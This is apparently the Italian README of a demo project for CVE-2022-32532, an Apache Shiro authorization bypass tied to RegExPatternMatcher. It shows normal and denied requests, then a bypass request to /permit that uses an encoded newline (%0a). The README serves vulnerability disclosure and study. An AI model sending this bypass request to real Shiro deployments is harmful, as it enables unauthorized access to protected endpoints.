
Apache Shiro CVE-2022-32532
Questo è un progetto demo, che mostra solo una delle condizioni per sfruttare questa vulnerabilità (CVE-2022-32532).
In effetti, ci sono più modi per sfruttarla, finché gli sviluppatori usano RegExPatternMatcher, ci sarà una possibile vulnerabilità di bypass.
La verifica dell'header di richiesta Token è richiesta nella configurazione corrente, altrimenti non si ha il permesso di accedere all'interfaccia sotto /permit
Questa richiesta può avere successo
GET /permit/any HTTP/1.1
Token: 4ra1n
L'accesso non è consentito quando non c'è alcun header di richiesta Token
GET /permit/any HTTP/1.1
Può essere bypassata in modo semplice in configurazioni speciali ma comuni
GET /permit/a%0any HTTP/1.1
https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
Questa vulnerabilità è simile a Spring-Security CVE-2022-22978
Ringraziamenti a bdemers (Apache Shiro PMC) e chybeta (Ricercatore di Sicurezza)